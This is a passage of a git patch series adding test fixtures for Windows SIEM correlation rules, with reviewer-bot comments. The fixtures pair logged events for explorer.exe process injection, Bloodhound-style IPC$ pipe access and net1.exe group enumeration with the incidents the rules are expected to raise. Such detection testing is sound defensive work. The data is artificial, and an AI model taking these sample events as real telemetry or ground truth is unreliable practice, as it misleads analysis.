@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T07:26:34.1336380Z\"},\"EventRecordID\":\"8484\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1876\",\"ThreadID\":\"1444\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 07:26:34.133\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-f7c9-5cc7-0000-0010bf010e00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"3772\"},{\"Name\":\"SourceImage\",\"text\":\"\\\\\\\\vboxsrv\\\\HTools\\\\m.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-f6c9-5cc7-0000-0010135f0600}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2812\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"840\"},{\"Name\":\"StartAddress\",\"text\":\"0x02060000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x02060000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": 
"thread", "object.id": "840", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "365abb72-f6c9-5cc7-0000-0010135f0600", "object.process.id": "2812", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T10:14:19.088Z", "status": "success", "subject": "process", "subject.process.fullpath": "\\\\vboxsrv\\htools\\m.exe", "subject.process.guid": "365abb72-f7c9-5cc7-0000-0010bf010e00", "subject.process.id": "3772", "subject.process.name": "m.exe", "subject.process.path": "\\\\vboxsrv\\htools\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T07:26:34.133Z", "type": "raw", "uuid": "3bf455ed-68e6-46f9-83b5-ae2345533b3d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "alert.key": "\\\\vboxsrv\\htools\\m.exe", "category.generic": "Attack", "category.high": "Defense Evasion", "category.low": "Process Injection", "correlation_name": "Suspicious_Explorer_Injection", "correlation_type": "incident", "datafield6": "0x02060000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Suspicious_Explorer_Injection|iewin7|m.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "thread", "object.process.fullpath": "c:\\windows\\explorer.exe", "object.process.guid": "365abb72-f6c9-5cc7-0000-0010135f0600", "object.process.id": "2812", "object.process.name": "explorer.exe", "object.process.path": "c:\\windows\\", "status": "success", "subject": "process", "subject.process.fullpath": "\\\\vboxsrv\\htools\\m.exe", 
"subject.process.guid": "365abb72-f7c9-5cc7-0000-0010bf010e00", "subject.process.id": "3772", "subject.process.name": "m.exe", "subject.process.path": "\\\\vboxsrv\\htools\\"} From 2e5488c8fd6a7a78c75e89f2ab868c261ea4e750 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:32:51 +0300 Subject: [PATCH 29/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Bloodhound)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_discovery/Bloodhound/tests/test_1.sc | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc new file mode 100644 index 00000000..da7d81f5 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Bloodhound/tests/test_1.sc 
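Review bot: The expected `"incident.aggregation.key": "Suspicious_Explorer_Injection|iewin7|m.exe"` aggregates on the bare process name, while `alert.key` in the same expectation uses the full UNC path `\\vboxsrv\htools\m.exe` and the Suspend_Process expectation above aggregates on `subject.process.fullpath` (and ReverseShell_created_via_PEInjection on the PID). Presumably the expected value mirrors the rule's aggregation template; if so, injections from differently located binaries that share a name would collapse into one incident, which seems unintended for a remote-thread-into-explorer detection, and keying on `subject.process.fullpath` would match the sibling rule. The placeholder comment line on the new side should be replaced with a scenario description as noted on the Subrule_ParentPid_Spoofing fixture.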
@@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.4093218Z\"},\"EventRecordID\":\"32857\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"samr\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", 
"event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\samr", "object.name": "samr", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\samr", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "samr", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.735Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.409Z", "type": "raw", "uuid": "b4d20c05-8b7f-4fbd-9809-5ae442ebd83b"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.4249182Z\"},\"EventRecordID\":\"32858\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"lsarpc\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", 
"event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\lsarpc", "object.name": "lsarpc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\lsarpc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "lsarpc", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.736Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.424Z", "type": "raw", "uuid": "a13d15b6-e9f0-4b43-a2f3-5c5fef6fd0f7"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5145\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12811\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-01-20T07:02:45.5501125Z\"},\"EventRecordID\":\"32862\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"436\",\"ThreadID\":\"444\"},\"Channel\":\"Security\",\"Computer\":\"WIN-77LTAPHIQ1R.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1587066498-1489273250-1035260531-1106\"},{\"Name\":\"SubjectUserName\",\"text\":\"user01\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x13659d\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"IpAddress\",\"text\":\"10.0.2.17\"},{\"Name\":\"IpPort\",\"text\":\"49420\"},{\"Name\":\"ShareName\",\"text\":\"\\\\\\\\*\\\\IPC$\"},{\"Name\":\"ShareLocalPath\"},{\"Name\":\"RelativeTargetName\",\"text\":\"srvsvc\"},{\"Name\":\"AccessMask\",\"text\":\"0x12019f\"},{\"Name\":\"AccessList\",\"text\":\"%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424\"},{\"Name\":\"AccessReason\",\"text\":\"-\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", 
"event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5145_A_network_share_object_was_checked", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5145", "normalized": true, "object": "file_object", "object.fullpath": "\\ipc$\\srvsvc", "object.name": "srvsvc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\srvsvc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "srvsvc", "object.storage.path": "\\", "object.type": "file", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T18:47:21.736Z", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.privileges": "%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424", "subject.account.session_id": "1271197", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-01-20T07:02:45.550Z", "type": "raw", "uuid": "d2931e0d-8404-474d-affa-180bf644e712"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "access", "alert.key": "samr, lsarpc, srvsvc", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Bloodhound", "correlation_type": "incident", "datafield6": "0x12019f", "datafield9": "READ_CONTROL|SYNCHRONIZE|ReadData (or ListDirectory)|WriteData (or AddFile)|AppendData (or AddSubdirectory or CreatePipeInstance)|ReadEA|WriteEA|ReadAttributes|WriteAttributes", "dst.fqdn": "win-77ltaphiq1r.example.corp", "dst.host": "win-77ltaphiq1r.example.corp", "dst.hostname": "win-77ltaphiq1r", "event_src.category": "Operating system", "event_src.fqdn": "win-77ltaphiq1r.example.corp", "event_src.host": "win-77ltaphiq1r.example.corp", "event_src.hostname": "win-77ltaphiq1r", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "object": "file_object", "object.fullpath": "\\ipc$\\srvsvc", "object.name": "srvsvc", "object.path": "\\ipc$\\", "object.storage.fullpath": "\\srvsvc", "object.storage.id": "\\\\*\\ipc$", "object.storage.name": "srvsvc", "object.storage.path": "\\", "src.host": "10.0.2.17", "src.ip": "10.0.2.17", "src.port": 49420, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1587066498-1489273250-1035260531-1106", "subject.account.name": "user01", "subject.account.session_id": "1271197"} From ea42aecd0356c0c7ae7ed1cb2b2fa5ea75ab34f9 Mon Sep 17 00:00:00 2001 
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Mon, 31 Jul 2023 13:39:49 +0300 Subject: [PATCH 30/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Enumerat?= =?UTF-8?q?ion=5FUsers=5FIn=5FGroups)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Enumeration_Users_In_Groups/tests/test_1.sc | 4 ++++ .../Enumeration_Users_In_Groups/tests/test_2.sc | 4 ++++ .../Enumeration_Users_In_Groups/tests/test_3.sc | 4 ++++ 3 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc new file mode 100644 index 00000000..f0a90af0 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_1.sc 
@@ -0,0 +1,4 @@
+{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4798\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:24:56.7402180Z\"},\"EventRecordID\":\"10089\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-500\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x10b4\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "0x10b4", "datafield3": "C:\\Windows\\System32\\", "datafield4": "net1.exe", "datafield5": "C:\\Windows\\System32\\net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4798_A_users_local_group_membership_was_enumerated", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4798", "normalized": true, "object": "user_group", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.domain": "msedgewin10", "object.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.name": "administrator", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:38:59.816Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:24:56.740Z", "type": "raw", "uuid": "a16eaf89-f02f-46ab-a0b0-c11d7800fb51"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "start", "alert.context": "administrator|", "alert.key": "net1.exe|ieuser", "category.generic": "Attack", "category.high": "Discovery", "category.low": "Account Discovery", "correlation_name": "Enumeration_Users_In_Groups", "correlation_type": "incident", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Enumeration_Users_In_Groups|msedgewin10|s-1-5-21-3461203602-4096304019-2269080069-1000", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.name": "administrator", "object.type": "local security-enabled", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc
new file mode 100644
index 00000000..af41e4ee
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_discovery/Enumeration_Users_In_Groups/tests/test_2.sc
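Review bot: The scaffold comment `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is committed verbatim instead of describing the case, here and in test_2.sc and test_3.sc of this commit, and again in both Local_Groups_Enumeration_Discovery fixtures of PATCH 31/57; replace it with a one-line statement of what the fixture proves, e.g. `# 4798 (a user's local group membership enumerated) raised by net1.exe under an interactive logon must produce one Enumeration_Users_In_Groups incident`. test_2.sc feeds the same event with only EventRecordID, TimeCreated, recv_time and uuid changed, so it duplicates this case rather than extending coverage. One of the two would be more useful as an `expect 0` case for an input the rule is meant to pass over, for instance a 4798 whose `CallerProcessName` is `-` as in the Local_Groups_Enumeration_Discovery/test_2.sc fixture, assuming the rule keys on the caller process — the rule itself is not in this diff, so that assumption needs confirming.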
@@ -0,0 +1,4 @@
+{"action": "view", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4798\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-05T09:24:56.7742573Z\"},\"EventRecordID\":\"10090\",\"Correlation\":{\"ActivityID\":\"{fdc063de-4b69-0000-5564-c0fd694bd501}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"1948\"},\"Channel\":\"Security\",\"Computer\":\"MSEDGEWIN10\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-500\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"MSEDGEWIN10\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2e47a\"},{\"Name\":\"CallerProcessId\",\"text\":\"0x10b4\"},{\"Name\":\"CallerProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\net1.exe\"}]}}}", "category.generic": "Group", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "189562", "datafield2": "0x10b4", "datafield3": "C:\\Windows\\System32\\", "datafield4": "net1.exe", "datafield5": "C:\\Windows\\System32\\net1.exe", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4798_A_users_local_group_membership_was_enumerated", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4798", "normalized": true, "object": "user_group", "object.account.domain": "msedgewin10", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.account.name": "administrator", "object.domain": "msedgewin10", "object.id": "S-1-5-21-3461203602-4096304019-2269080069-500", "object.name": "administrator", "object.type": "local security-enabled", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T17:39:07.135Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.account.name": "ieuser", "subject.account.session_id": "189562", "subject.domain": "msedgewin10", "subject.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "subject.name": "ieuser", "subject.process.fullpath": "C:\\Windows\\System32\\net1.exe", "subject.process.id": "0x10b4", "subject.process.name": "net1.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-05T09:24:56.774Z", "type": "raw", "uuid": "2cbb9a35-9af7-484a-9d62-d969dc501d1f"}
+
+# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
